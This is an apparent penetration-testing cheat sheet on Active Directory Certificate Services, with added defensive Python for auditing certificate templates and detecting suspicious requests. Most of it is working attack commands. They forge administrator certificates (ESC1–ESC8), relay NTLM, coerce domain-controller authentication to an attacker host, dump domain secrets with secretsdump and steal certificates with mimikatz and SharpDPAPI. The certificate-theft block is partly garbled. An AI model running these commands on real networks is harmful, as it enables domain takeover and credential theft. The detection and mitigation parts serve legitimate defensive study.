# Active Directory Certificate Services (AD CS) Attacks

Exploit Active Directory Certificate Services misconfigurations to obtain certificates for privilege escalation. AD CS attacks, particularly ESC8, provide powerful privilege escalation paths that defenders often overlook.
## Quick Reference

```bash
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
impacket-ntlmrelayx -t http://ca-server/certsrv/certfnsh.asp --adcs --template KerberosAuthentication
certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10
```
## AD CS Enumeration

### Certipy

```bash
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10 -vulnerable
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10 -vulnerable -output certipy_output
certipy find -u user@domain.local -p password -ca CA-NAME
```
### Certutil (Windows)

```powershell
# List certificate authorities
certutil -config - -ping
# List certificate templates
certutil -v -template
# View CA configuration
certutil -CAInfo
# List issued certificates (Disposition 20 = issued)
certutil -view -restrict "Disposition=20" -out "RequesterName,CommonName"
```
## ESC1 - Enrollee Supplies Subject

### Vulnerability

Template allows:

- Client authentication
- Enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
- No manager approval required
- Low-privileged users can enroll
### Exploitation

```bash
certipy req -u user@domain.local -p password -ca CA-NAME -template VulnerableTemplate -upn administrator@domain.local -dc-ip 10.10.10.10
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
export KRB5CCNAME=administrator.ccache
impacket-psexec -k -no-pass domain.local/administrator@dc.domain.local
```
## ESC2 - Any Purpose EKU

### Vulnerability

Template allows:

- Any Purpose EKU or no EKU
- Low-privileged users can enroll
### Exploitation

```bash
certipy req -u user@domain.local -p password -ca CA-NAME -template VulnerableTemplate -dc-ip 10.10.10.10
certipy auth -pfx user.pfx -dc-ip 10.10.10.10
```
## ESC3 - Certificate Request Agent

### Vulnerability

Template allows:

- Certificate Request Agent EKU
- No enrollment agent restrictions
### Exploitation

```bash
certipy req -u user@domain.local -p password -ca CA-NAME -template VulnerableTemplate -dc-ip 10.10.10.10
certipy req -u user@domain.local -p password -ca CA-NAME -template User -on-behalf-of 'domain\administrator' -pfx enrollment_agent.pfx -dc-ip 10.10.10.10
```
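As an added audit example (not code from the original cheat sheet or from Certipy), the function below checks a template's LDAP attributes against the ESC1, ESC2 and ESC3 conditions listed in the three sections above, the check a defender runs over an export of their own templates. The template records, the low-privilege group list and the sample attribute values are constructed assumptions; the flag bits and EKU OIDs are the standard AD CS values.

```python
# Added audit example, not code from the original cheat sheet or from Certipy:
# classify templates against the ESC1/ESC2/ESC3 conditions described above.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (manager approval)

OID_ANY_PURPOSE = "2.5.29.37.0"
OID_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
# Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2", "1.3.6.1.5.2.3.4", "1.3.6.1.4.1.311.20.2.2", OID_ANY_PURPOSE}
# Assumed: principals treated as low-privileged enrollers.
LOW_PRIV_ENROLLERS = {"Domain Users", "Authenticated Users", "Domain Computers"}


def audit_template(tpl):
    """Return the subset of {"ESC1", "ESC2", "ESC3"} whose conditions the template meets."""
    ekus = set(tpl.get("pKIExtendedKeyUsage", []))
    findings = set()
    # All three cases require low-privileged enrollment with no manager approval.
    if not (LOW_PRIV_ENROLLERS & set(tpl.get("enroll", []))):
        return findings
    if tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        return findings
    # An empty EKU list makes the certificate usable for any purpose, including auth.
    if tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and (not ekus or ekus & AUTH_EKUS):
        findings.add("ESC1")
    if not ekus or OID_ANY_PURPOSE in ekus:
        findings.add("ESC2")
    if OID_CERT_REQUEST_AGENT in ekus:
        findings.add("ESC3")
    return findings


def audit_all(templates):
    """Map template name -> sorted findings, omitting templates with none."""
    found = {t["name"]: audit_template(t) for t in templates}
    return {name: sorted(f) for name, f in found.items() if f}


# Constructed sample templates; attribute values are illustrative, not real defaults.
SAMPLE_TEMPLATES = [
    {"name": "VulnerableTemplate", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "AnyPurpose", "msPKI-Certificate-Name-Flag": 0x0, "msPKI-Enrollment-Flag": 0x0,
     "pKIExtendedKeyUsage": [OID_ANY_PURPOSE], "enroll": ["Authenticated Users"]},
    {"name": "EnrollmentAgent", "msPKI-Certificate-Name-Flag": 0x0, "msPKI-Enrollment-Flag": 0x0,
     "pKIExtendedKeyUsage": [OID_CERT_REQUEST_AGENT], "enroll": ["Domain Users"]},
    {"name": "ApprovedOnly", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
]
```

Feeding `audit_all` the templates from an LDAP export of `CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,...` gives the same triage as a `certipy find -vulnerable` run, but from the defender's side and without touching the CA.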
## ESC4 - Vulnerable Certificate Template ACL

### Vulnerability

Low-privileged user has write access to a certificate template.
### Exploitation

```bash
certipy template -u user@domain.local -p password -template SecureTemplate -save-old
certipy req -u user@domain.local -p password -ca CA-NAME -template SecureTemplate -upn administrator@domain.local -dc-ip 10.10.10.10
certipy template -u user@domain.local -p password -template SecureTemplate -configuration SecureTemplate.json
```
## ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2

### Vulnerability

CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set, allowing SAN specification in any template.
### Exploitation

```bash
certipy req -u user@domain.local -p password -ca CA-NAME -template User -upn administrator@domain.local -dc-ip 10.10.10.10
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
```
## ESC7 - Vulnerable CA ACL

### Vulnerability

Low-privileged user has ManageCA or ManageCertificates rights on the CA.
### Exploitation

```bash
certipy ca -u user@domain.local -p password -ca CA-NAME -add-officer user -dc-ip 10.10.10.10
certipy ca -u user@domain.local -p password -ca CA-NAME -enable-template VulnerableTemplate -dc-ip 10.10.10.10
certipy ca -u user@domain.local -p password -ca CA-NAME -issue-request 123 -dc-ip 10.10.10.10
```
## ESC8 - NTLM Relay to AD CS HTTP Endpoints

### Vulnerability

AD CS web enrollment is accessible over HTTP without EPA or SMB signing.
### Setup NTLM Relay

```bash
impacket-ntlmrelayx -t http://ca-server/certsrv/certfnsh.asp --adcs --template KerberosAuthentication -smb2support
impacket-ntlmrelayx -t http://ca-server/certsrv/certfnsh.asp --adcs --template DomainController -smb2support
```
### Coerce Authentication

```bash
python3 printerbug.py domain.local/user:password@dc.domain.local attacker-ip
python3 PetitPotam.py attacker-ip dc.domain.local -u user -p password
coercer coerce -u user -p password -d domain.local -l attacker-ip -t dc.domain.local
```
### Use Certificate

```bash
certipy cert -pfx dc01.pfx -nokey -out dc01.crt
certipy cert -pfx dc01.pfx -nocert -out dc01.key
certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10
sudo ntpdate -s dc.domain.local
export KRB5CCNAME=dc01.ccache
impacket-secretsdump -k -no-pass domain.local/dc01\$@dc.domain.local
```
## Certificate Theft

```powershell
.\SharpDPAPI.exe certificates /machine
.\mimikatz.exe
mimikatz
mimikatz
```
## File System Certificate Theft

```bash
find / -name "*.pfx" 2>/dev/null
find / -name "*.p12" 2>/dev/null
```

```powershell
dir /s /b *.pfx
dir /s /b *.p12
```
## Pass-the-Certificate

### gettgtpkinit.py

```bash
python3 gettgtpkinit.py -cert-pfx user.pfx -dc-ip 10.10.10.10 domain.local/user user.ccache
export KRB5CCNAME=user.ccache
impacket-psexec -k -no-pass domain.local/user@target.domain.local
```
### Rubeus (Windows)

```powershell
.\Rubeus.exe asktgt /user:user /certificate:user.pfx /password:certpass /ptt
klist
dir \\dc\c$
```
## Notes

### ESC Attack Summary

| ESC | Vulnerability | Impact | Difficulty |
|-----|---------------|--------|------------|
| ESC1 | Enrollee supplies subject | Domain Admin | Easy |
| ESC2 | Any Purpose EKU | Domain Admin | Easy |
| ESC3 | Certificate Request Agent | Domain Admin | Medium |
| ESC4 | Vulnerable template ACL | Domain Admin | Medium |
| ESC5 | Vulnerable PKI object ACL | Domain Admin | Medium |
| ESC6 | EDITF_ATTRIBUTESUBJECTALTNAME2 | Domain Admin | Easy |
| ESC7 | Vulnerable CA ACL | Domain Admin | Medium |
| ESC8 | NTLM relay to HTTP | Domain Admin | Easy |
### Detection

AD CS attacks generate:

- Event ID 4886 (Certificate Services received certificate request)
- Event ID 4887 (Certificate Services approved and issued certificate)
- Event ID 4768 (Kerberos TGT requested) with certificate
- Event ID 4769 (Kerberos TGS requested) with certificate
- Unusual certificate requests for privileged accounts
- Certificate requests with SAN for different users
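The last two bullets above as a concrete check, added here and not part of the original cheat sheet: the script correlates 4886 and 4887 records by Request ID and flags requests whose SAN names an account other than the requester, or a privileged account. The event records and the privileged-account watch list are constructed assumptions; field names follow the CA database columns shown in the certutil section rather than any particular SIEM schema.

```python
# Added detection example, not code from the original cheat sheet: correlate Event ID
# 4886 (request received) with 4887 (certificate issued) per Request ID and flag SANs
# that name a different account than the requester or a privileged account.
PRIVILEGED_ACCOUNTS = {"administrator", "dc01$"}  # assumed watch list

# Constructed sample records in the shape a log collector would hand over
# (requester as DOMAIN\name, SAN UPN when the request carried one).
SAMPLE_EVENTS = [
    {"event_id": 4886, "request_id": 101, "requester": "DOMAIN\\user",
     "template": "User", "san_upn": "user@domain.local"},
    {"event_id": 4887, "request_id": 101, "requester": "DOMAIN\\user",
     "template": "User", "san_upn": "user@domain.local"},
    {"event_id": 4886, "request_id": 102, "requester": "DOMAIN\\user",
     "template": "VulnerableTemplate", "san_upn": "administrator@domain.local"},
    {"event_id": 4887, "request_id": 102, "requester": "DOMAIN\\user",
     "template": "VulnerableTemplate", "san_upn": "administrator@domain.local"},
    {"event_id": 4886, "request_id": 103, "requester": "DOMAIN\\svc-backup",
     "template": "KerberosAuthentication", "san_upn": "dc01$@domain.local"},
]


def account_name(principal):
    """Normalise 'DOMAIN\\name' or 'name@domain' to a lowercase account name ('' if None)."""
    return (principal or "").split("\\")[-1].split("@")[0].lower()


def correlate(events):
    """Group events by Request ID, noting whether a 4887 (issuance) was seen for it."""
    requests = {}
    for e in events:
        r = requests.setdefault(e["request_id"], dict(e, issued=False))
        if e["event_id"] == 4887:
            r["issued"] = True
    return requests


def find_suspicious(events):
    """Return [(request_id, issued, [reasons])] for requests matching either pattern."""
    alerts = []
    for rid, r in sorted(correlate(events).items()):
        requester, san = account_name(r["requester"]), account_name(r.get("san_upn"))
        reasons = []
        if san and san != requester:
            reasons.append(f"SAN '{san}' differs from requester '{requester}'")
        if san in PRIVILEGED_ACCOUNTS:
            reasons.append(f"SAN names privileged account '{san}'")
        if reasons:
            alerts.append((rid, r["issued"], reasons))
    return alerts
```

An alert with `issued=True` means a certificate already exists and should be revoked on the CA, whereas `issued=False` (a 4886 with no matching 4887 yet) is a pending or denied request.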
### Time Skew Issues

Kerberos requires time sync within 5 minutes:

```bash
sudo ntpdate -s dc.domain.local
faketime "$(rdate -n dc.domain.local -p | awk '{print $2, $3, $4}')" bash
```
### Certificate Validity

- Certificates remain valid even after a password change
- Certificates can be used for authentication until expiration
- Default validity: 1 year
- Useful for persistence
### Common Misconfigurations

Frequently found issues:

- Web enrollment over HTTP (ESC8)
- Templates with enrollee supplies subject (ESC1)
- EDITF_ATTRIBUTESUBJECTALTNAME2 enabled (ESC6)
- Overly permissive template ACLs (ESC4)
- Any Purpose EKU templates (ESC2)
### Mitigation Recommendations

For clients:

- Disable HTTP enrollment (use HTTPS with EPA)
- Enable SMB signing on all systems
- Audit certificate template permissions
- Remove the enrollee supplies subject flag
- Disable EDITF_ATTRIBUTESUBJECTALTNAME2
- Implement manager approval for sensitive templates
- Monitor Event IDs 4886 and 4887
- Regular AD CS security audits
- Implement certificate enrollment restrictions
- Use short certificate validity periods
### Certipy vs Certify

| Feature | Certipy (Linux) | Certify (Windows) |
|---------|-----------------|-------------------|
| Enumeration | ✓ | ✓ |
| ESC1-8 | ✓ | ✓ |
| Certificate request | ✓ | ✓ |
| Authentication | ✓ | ✗ (use Rubeus) |
| Template modification | ✓ | ✗ |
| Cross-platform | Linux | Windows |